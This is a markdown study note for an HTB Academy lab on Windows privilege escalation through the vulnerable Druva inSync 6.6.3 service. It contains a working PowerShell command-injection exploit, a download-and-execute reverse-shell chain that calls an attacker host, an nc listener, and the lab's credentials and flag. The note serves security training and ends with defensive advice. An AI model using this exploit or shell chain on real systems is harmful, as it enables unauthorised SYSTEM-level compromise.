Skip to content

vulnerable-services.md

Latest commit

 

History

History
265 lines (210 loc) · 7.95 KB

vulnerable-services.md

File metadata and controls

265 lines (210 loc) · 7.95 KB

Vulnerable Services Privilege Escalation

🎯 Overview

Vulnerable third-party services provide privilege escalation opportunities even on well-patched systems. Users installing software or organizations using vulnerable applications create attack vectors. Many third-party services run with SYSTEM privileges, making them high-value targets for local privilege escalation.

🔍 Third-Party Software Enumeration

Installed Programs Discovery

# Enumerate installed applications
wmic product get name

# Example output with vulnerable software:
Name
Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.28.29910
VMware Tools
Druva inSync 6.6.3                    # ← Vulnerable version
Microsoft Update Health Tools

Service Process Mapping

# Check for running services on specific ports
netstat -ano | findstr 6064

# Expected output:
TCP    127.0.0.1:6064         0.0.0.0:0              LISTENING       3324

# Map process ID to running process
get-process -Id 3324

# Verify service details
get-service | ? {$_.DisplayName -like 'Druva*'}

💥 Druva inSync 6.6.3 Exploitation

Vulnerability Details

# CVE Information:
- Application: Druva inSync Client (backup/eDiscovery)
- Vulnerable Version: 6.6.3
- Service Context: NT AUTHORITY\SYSTEM
- Attack Vector: Command injection via RPC service
- Local Port: 6064
- Impact: Remote code execution as SYSTEM

PowerShell Exploit PoC

# Basic command injection template
$ErrorActionPreference = "Stop"

$cmd = "net user pwnd /add"    # ← Modify this command

$s = New-Object System.Net.Sockets.Socket(
    [System.Net.Sockets.AddressFamily]::InterNetwork,
    [System.Net.Sockets.SocketType]::Stream,
    [System.Net.Sockets.ProtocolType]::Tcp
)
$s.Connect("127.0.0.1", 6064)

$header = [System.Text.Encoding]::UTF8.GetBytes("inSync PHC RPCW[v0002]")
$rpcType = [System.Text.Encoding]::UTF8.GetBytes("$([char]0x0005)`0`0`0")
$command = [System.Text.Encoding]::Unicode.GetBytes("C:\ProgramData\Druva\inSync4\..\..\..\Windows\System32\cmd.exe /c $cmd");
$length = [System.BitConverter]::GetBytes($command.Length);

$s.Send($header)
$s.Send($rpcType)
$s.Send($length)
$s.Send($command)

🎯 HTB Academy Lab Solution

Lab Environment

  • Target: 10.129.223.93 (ACADEMY-WINLPE-WS01)
  • Credentials: htb-student:HTB_@cademy_stdnt!
  • Access Method: xfreerdp
  • Vulnerable Service: Druva inSync 6.6.3 (running on port 6064)
  • Flag Location: C:\Users\Administrator\Desktop\VulServices\flag.txt
  • Flag: Aud1t_th0se_th1rd_paRty_s3rvices!

Detailed Walkthrough

1. Connect via RDP

# Connect to target using xfreerdp
xfreerdp /v:10.129.43.44 /u:htb-student /p:HTB_@cademy_stdnt!

# Expected output:
[16:18:25:879] [4321:4323] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state
[16:18:25:880] [4321:4323] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr
[16:18:25:880] [4321:4323] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpsnd
[16:18:25:880] [4321:4323] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr

2. Enumerate Druva inSync Service

# Open PowerShell and find process listening on port 6064
netstat -ano | findstr 6064

# Expected output:
TCP    127.0.0.1:6064         0.0.0.0:0              LISTENING       3416
TCP    127.0.0.1:6064         127.0.0.1:55619        ESTABLISHED     3416
TCP    127.0.0.1:55619        127.0.0.1:6064         ESTABLISHED     3984
TCP    127.0.0.1:62905        127.0.0.1:6064         TIME_WAIT       0
TCP    127.0.0.1:62906        127.0.0.1:6064         TIME_WAIT       0

# Map process ID to running process (use PID from netstat output)
get-process -id 3416

# Expected output:
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    143       9     1420       6476              3416   0 inSyncCPHwnet64

# Verify Druva service is running
get-service | ? {$_.DisplayName -like 'Druva*'}

# Expected output:
Status   Name               DisplayName
------   ----               -----------
Running  inSyncCPHService   Druva inSync Client Service

3. Prepare Attack Infrastructure on Pwnbox

# Download Invoke-PowerShellTcp.ps1 from GitHub and rename to shell.ps1
# Add this line at the bottom of shell.ps1:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.80 -Port 9443

# Start Python HTTP server in same directory as shell.ps1
python3 -m http.server 8080

# Expected output:
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...

4. Configure Druva Exploit Script

# On Windows target, use File Explorer to navigate to C:\Tools
# Edit Druva.ps1 script with Notepad
# Replace IP address and port with Pwnbox IP address

# The Druva.ps1 script should be modified to contain:
$cmd = "powershell IEX(New-Object Net.Webclient).downloadString('http://10.10.14.80:8080/shell.ps1')"
# (Replace 10.10.14.80 with your actual Pwnbox IP)

5. Start Netcat Listener on Pwnbox

# Start listener on same port as specified in shell.ps1
nc -lvnp 9443

# Expected output:
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9443
Ncat: Listening on 0.0.0.0:9443

6. Execute Druva Exploit

# On Windows target, navigate to C:\Tools in PowerShell
cd C:\Tools

# Execute the Druva exploit script
.\Druva.ps1

# Expected output:
22
4
4
316

7. Receive SYSTEM Shell

# On Pwnbox nc listener, you should receive connection:
Ncat: Connection from 10.129.43.44.
Ncat: Connection from 10.129.43.44:55778.
Windows PowerShell running as user WINLPE-WS01$ on WINLPE-WS01
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\WINDOWS\system32>

8. Access Flag

# Verify SYSTEM privileges and access flag
whoami
# Should show: nt authority\system

# Access the flag file
type C:\Users\Administrator\Desktop\VulServices\flag.txt

# Flag: ...

🔄 Additional Vulnerable Services

Common Third-Party Targets

# High-risk applications often found in enterprise:
- Backup software (Druva, Veeam, etc.)
- Remote management tools (TeamViewer, VNC, etc.)
- Development tools (Git clients, IDEs, etc.)
- Database clients (MySQL Workbench, etc.)
- File sharing applications
- Antivirus/security software

Service Discovery Methodology

# 1. Software enumeration
wmic product get name
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select DisplayName, DisplayVersion

# 2. Running services analysis
Get-Service | Where-Object {$_.Status -eq "Running"}
netstat -ano | findstr LISTENING

# 3. Process investigation
Get-Process | Where-Object {$_.ProcessName -notlike "System*"}

# 4. Vulnerability research
# Search for: "ApplicationName version CVE"
# Check exploit databases for PoC code

⚠️ Detection & Defense

Detection Indicators

# Monitor for:
- Unusual network connections to localhost high ports
- PowerShell execution with network download strings
- Service process spawning unexpected child processes
- Command injection patterns in application logs

Defensive Measures

# Security hardening:
- Restrict local administrator rights
- Implement application whitelisting
- Regular third-party software audits
- Patch management for all applications
- Network segmentation and monitoring
- PowerShell logging and monitoring

💡 Key Takeaways

  1. Third-party software introduces significant attack surface
  2. Service enumeration critical for identifying vulnerable applications
  3. Command injection common in backup/management software
  4. SYSTEM context services provide immediate privilege escalation
  5. PowerShell payloads effective for fileless exploitation
  6. Application whitelisting essential defensive measure

Vulnerable services exploitation highlights the importance of comprehensive software inventory and patch management in enterprise environments.